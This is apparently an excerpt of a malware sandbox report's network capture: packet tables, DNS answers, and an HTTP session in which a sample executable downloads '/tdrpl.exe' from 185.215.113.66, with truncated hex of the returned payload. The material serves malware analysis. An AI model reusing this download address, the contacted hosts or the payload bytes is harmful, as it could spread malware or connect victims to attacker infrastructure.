                                                                                                                                  Oct 28, 2024 11:11:23.825973034 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.826015949 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.826025009 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.826057911 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.826069117 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.826093912 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.826128960 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.826145887 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.826164007 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.826173067 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.826200008 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.826244116 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.826839924 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.826951027 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.826997042 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.827004910 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.827040911 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.827049017 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.827075005 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.827112913 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.827121019 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.827147007 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.827182055 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.827194929 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.827217102 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.827225924 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.827533007 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.827773094 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.827914953 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.829185963 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.829250097 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978037119 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978091002 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978091955 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978110075 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978136063 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978142977 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978156090 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978163004 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978183031 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978203058 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978228092 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978317022 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978338957 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978359938 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978383064 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978389978 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978403091 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978411913 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978430033 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978451967 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978458881 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978473902 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978480101 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978493929 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978499889 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978511095 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978513002 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:23.978534937 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:23.978559017 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:24.667268991 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:24.744996071 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:24.914130926 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:24.994450092 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:25.000492096 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.000557899 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:25.006009102 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.069521904 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:25.074881077 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.074949980 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:25.080297947 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.366837025 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.441555977 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.441606045 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:25.482867956 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:25.488224030 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.488276005 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:25.493709087 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.590903044 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:25.596332073 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.596422911 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:25.596575022 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:25.602451086 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.604454041 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:25.610425949 CET40500497352.186.114.89192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:25.610485077 CET4973540500192.168.2.42.186.114.89
                                                                                                                                  Oct 28, 2024 11:11:26.495398998 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495412111 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495430946 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495439053 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495455980 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495464087 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495481014 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495488882 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495491028 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.495505095 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495515108 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.495539904 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.495539904 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.495563030 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.500952005 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.501005888 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.501013041 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.501034021 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.501283884 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641047955 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641144991 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641324043 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641331911 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641393900 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641402960 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641417980 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641417980 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641457081 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641479015 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.641901016 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641910076 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641927004 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641933918 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.641976118 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.642030001 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.642525911 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642535925 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642551899 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642565966 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642580986 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.642595053 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.642616034 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.643533945 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643542051 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643558025 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643564939 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643574953 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.643599033 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.643632889 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.644505978 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.644514084 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.644530058 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.644567966 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.644618034 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.646672010 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.646682024 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.646779060 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.646804094 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.646858931 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787031889 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787043095 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787069082 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787079096 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787095070 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787103891 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787121058 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787126064 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787163973 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787175894 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787353039 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787424088 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787431002 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787516117 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787524939 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787540913 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787544012 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787575006 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787601948 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787794113 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787805080 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787830114 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787837982 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787853956 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787859917 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787863970 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.787882090 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.787900925 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.788331032 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788340092 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788348913 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788357019 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788383007 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.788414955 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788434029 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788441896 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788456917 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788465023 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.788467884 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788476944 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788485050 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.788505077 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.788542986 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.789098024 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789107084 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789123058 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789170027 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.789314985 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789330959 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789340019 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789383888 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.789388895 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789397001 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789403915 CET804974091.202.233.141192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:26.789410114 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:26.789473057 CET4974080192.168.2.491.202.233.141
                                                                                                                                  Oct 28, 2024 11:11:28.278330088 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.278707027 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.414951086 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:28.415043116 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.415307045 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.418035984 CET8049734185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:28.418095112 CET4973480192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:28.420787096 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339632034 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339646101 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339658022 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339673042 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339682102 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339692116 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339704990 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339714050 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339713097 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.339724064 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339735031 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.339755058 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.339755058 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.339896917 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.340420961 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.340646029 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:29.345300913 CET8057562185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:29.345419884 CET5756280192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:30.356348991 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:30.362339020 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:30.365775108 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:30.365884066 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:30.371840954 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:30.605326891 CET5756440500192.168.2.42.63.29.22
                                                                                                                                  Oct 28, 2024 11:11:30.611072063 CET40500575642.63.29.22192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:30.613800049 CET5756440500192.168.2.42.63.29.22
                                                                                                                                  Oct 28, 2024 11:11:30.615005016 CET5756440500192.168.2.42.63.29.22
                                                                                                                                  Oct 28, 2024 11:11:30.620460987 CET40500575642.63.29.22192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:30.621777058 CET5756440500192.168.2.42.63.29.22
                                                                                                                                  Oct 28, 2024 11:11:30.627492905 CET40500575642.63.29.22192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283780098 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283879995 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283895969 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283911943 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283926010 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283941984 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283957005 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283957005 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:31.283957005 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:31.283972025 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283988953 CET8057563185.215.113.66192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:31.283993006 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:31.283993006 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:31.284001112 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:31.284034014 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:33.024405956 CET5756440500192.168.2.42.63.29.22
                                                                                                                                  Oct 28, 2024 11:11:33.024519920 CET5756380192.168.2.4185.215.113.66
                                                                                                                                  Oct 28, 2024 11:11:33.024703026 CET4974080192.168.2.491.202.233.141

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Oct 28, 2024 11:11:23.546010017 CET5034540500192.168.2.45.239.153.192
                                                                                                                                  Oct 28, 2024 11:11:27.628107071 CET53651311.1.1.1192.168.2.4
                                                                                                                                  Oct 28, 2024 11:11:28.559672117 CET5034540500192.168.2.45.75.95.114

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                  Oct 28, 2024 11:11:23.587496042 CET1.1.1.1192.168.2.40x22ddNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                  Oct 28, 2024 11:11:23.587496042 CET1.1.1.1192.168.2.40x22ddNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • 185.215.113.66
                                                                                                                                  • 91.202.233.141

                                                                                                                                  HTTP Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  0192.168.2.449730185.215.113.66806852C:\Users\user\Desktop\Bjl3geiFEK.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 28, 2024 11:11:11.845627069 CET282OUTGET /tdrpl.exe HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                  Host: 185.215.113.66
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Oct 28, 2024 11:11:12.754463911 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Mon, 28 Oct 2024 10:11:12 GMT
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Length: 85504
                                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:13:32 GMT
                                                                                                                                  Connection: keep-alive
                                                                                                                                  ETag: "6715484c-14e00"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 [TRUNCATED]
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mpj)9)9)9 9.9Q8+9C9+9A9(99+9s9-9)99e9<9 9-9 959 9(9Rich)9PELgp@y@p|0.text `.rdata?@@@.data.@2@
                                                                                                                                  Oct 28, 2024 11:11:12.754487038 CET112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66
                                                                                                                                  Data Ascii: Ul$E V3W|$ tO9ufPf;Wt@uu"j
